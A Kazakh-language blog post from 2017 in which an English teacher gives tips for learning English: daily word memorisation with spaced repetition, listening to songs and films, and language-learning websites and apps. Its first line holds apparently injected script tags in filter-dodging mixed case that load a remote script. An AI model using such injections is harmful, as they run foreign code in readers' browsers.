<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.10.2017

Ағылшын тілін қалай тез меңгеруге болады?

Құрметті әріптестер, ағылшын тілін үйренгілеріңіз келсе ең алдымен бір нәрсені нақты қолға алған соң соған арнайы уақыт арнауыңыз керек. Бұдан бұрын әрине ең алдымен талпыныс,қызығушылық қажет. Олай болса төмендегі кеңестерге құлақ сала жүріңіздер.

1.Күніне 5-10 сөз жаттау.

Кез-келген он сөзді алып, оның оқылуын, жазылуын жаттау керек. Ол сөздер есте қалу үшін  20-30 минуттан , 4-5 сағаттан соң, 2-3 күннен соң, 1 аптадан соң,1 айдан соң әбден қайталау керек.

2. Тыңдау

Тыңдау өте маңызды. Ағылшынша әндерді тыңдап оның мағынасын түсініп бірге айтқан өте пайдалы. Сүйікті фильмдеріңізді де ағылшынша түсініп көруге үйреніңіз.

3. Ғаламтор

Күнделікті 1 сағатыңды ғаламтордағы ағылшын тілін үйрететін сайттарда өткізген дұрыс.Мысалы мына сайттан http://kz.educator.com/ ағылшынша сабақтарды таба аласыздар. Тек қана ағылшын емес сонымен қатар математика, физика, химия т.б пәндерді ағылшынша үйренуге мүмкіндік бар.

Сонымен қатар ұялы телефонға әр түрлі полиглоттарды жазып алған дұрыс. Өйткені кез келген адам қолынан телефонды тастамайды.Көлікте келе жатып осындай нәрселермен айналысқан дұрыс(чем Вк, инстаграм,ватсапқа кіргенше)

Ағылшын тілін  https://lingualeo.com/ru сайтынан керемет түсінуге болады. Оны телефонға көшіріп алуға болады.

Ағылшын тілі пәнінің мұғалімі: Самурат Н

Просмотров: 653


Пікір қосу



Деректерді қолтаңбаға қосу